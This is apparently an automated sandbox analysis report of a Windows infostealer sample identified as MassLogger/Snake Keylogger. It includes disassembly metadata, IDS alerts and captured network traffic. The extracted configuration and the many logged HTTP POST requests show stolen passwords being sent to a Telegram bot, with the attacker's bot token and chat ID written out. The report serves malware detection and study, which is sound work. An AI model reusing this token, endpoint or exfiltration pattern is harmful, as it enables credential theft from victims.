Error launching installer, xrefs: 00405748

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78

Function 00151A40 Relevance: 5.1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

Strings

Xhq, xrefs: 00151A76
Xhq, xrefs: 00151B2F
Xhq, xrefs: 00151AB0
Xhq, xrefs: 00151B7C

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID: Xhq$Xhq$Xhq$Xhq
API String ID: 0-3565632849
Opcode ID: bd4ba88cc248bfb55c77f74d89d57dab71871d1dff15f5daaa02f792f975ee94
Instruction ID: 5822f02ea1f7039511748086ab8995d699389fe80dd727c0ba828b42a5e6aa0f
Opcode Fuzzy Hash: bd4ba88cc248bfb55c77f74d89d57dab71871d1dff15f5daaa02f792f975ee94
Instruction Fuzzy Hash: 4C318675D0031DDFDF668BA988503BEB7F2AF95311F1440A5CC69AB240EB708D89CB92

Function 001558E8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;dq, xrefs: 00155926
\;dq, xrefs: 001558FE
\;dq, xrefs: 001558F4
\;dq, xrefs: 0015591A

Memory Dump Source

Source File: 00000004.00000002.2989268466.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_150000_grrezORe7h.jbxd

Similarity

API ID:
String ID: \;dq$\;dq$\;dq$\;dq
API String ID: 0-1855092343
Opcode ID: 7bac71976ef34cbff805724e0cf39c3cefa17d7c7b34e8cd999277627c121d19
Instruction ID: a0bdc892e56e500aca1ee42bf58c1d73d31da2d98d58ea9206cf9b0a4e3dbd50
Opcode Fuzzy Hash: 7bac71976ef34cbff805724e0cf39c3cefa17d7c7b34e8cd999277627c121d19
Instruction Fuzzy Hash: 1F018431710925CFCB248E2DC460A2677E7AF987BA7264169EC29CF3B0DB35DC458791

Function 00405B8F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1

Memory Dump Source

Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

Source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
Source: grrezORe7h.exe.7776.4.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}

Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36ECD1EC CryptUnprotectData,		4_2_36ECD1EC
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36ECD9D9 CryptUnprotectData,		4_2_36ECD9D9

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49856 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49933 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49883 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49933 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49856 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49883 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49868 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49868 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49810 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49810 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50017 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50017 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49993 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49822 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50046 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50046 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49822 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49895 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49904 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49895 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50070 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49904 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50029 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50066 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50070 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49945 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50029 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50066 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49957 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49945 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49957 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49993 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50064 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49917 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50064 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49917 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49832 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49832 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49969 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50048 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49969 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50048 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50060 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50060 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50056 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50056 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49981 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50052 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49981 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50052 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49844 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49844 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50041 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50068 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50041 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50068 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50050 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50050 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50005 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50005 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50062 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50062 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50054 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50054 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50058 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50058 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50072 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:50072 -> 149.154.167.220:443

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31dea4934fa5Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31f39219a5f5Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd320870af382eHost: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd321d4072b991Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32309fc74a6bHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3242917a2401Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd325897e9bff1Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd326bcf5d4f67Host: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd327c3cd25000Host: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd328f5a1d1c8dHost: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32a26a7e53b1Host: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32b6c93ca24dHost: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32c9bf1af266Host: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32db4edd8fcdHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32ef841d8f04Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33025319aa33Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33166bdcba3fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd332920706cf4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd333d1c059f2aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd334e617abdefHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3360eddb09a8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33721b5eeed7Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3385df447484Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33984405d90aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33b5145197d2Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33cf2e35ee98Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33e3ffe66eb3Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33fb59f8d8edHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd341919464094Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34357477f033Host: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34663c8145e3Host: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd347fcfb3bfa5Host: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34bcf6e6755fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd35a148fe7d29Host: api.telegram.orgContent-Length: 1090

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36ECC985h	4_2_36ECC638
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36EC1042h	4_2_36EC0C28
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36EC0671h	4_2_36EC03B0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36ECE198h	4_2_36ECDEFA
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36ECEA48h	4_2_36ECE79F
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36EC1042h	4_2_36EC0F6F
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36ECB791h	4_2_36ECB4EC
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36EC1042h	4_2_36EC0C22
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36EC1042h	4_2_36EC0C1C
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36EC1042h	4_2_36EC0C1A
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36ECC041h	4_2_36ECBD88
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4x nop then jmp 36ECDD40h	4_2_36ECDAA2
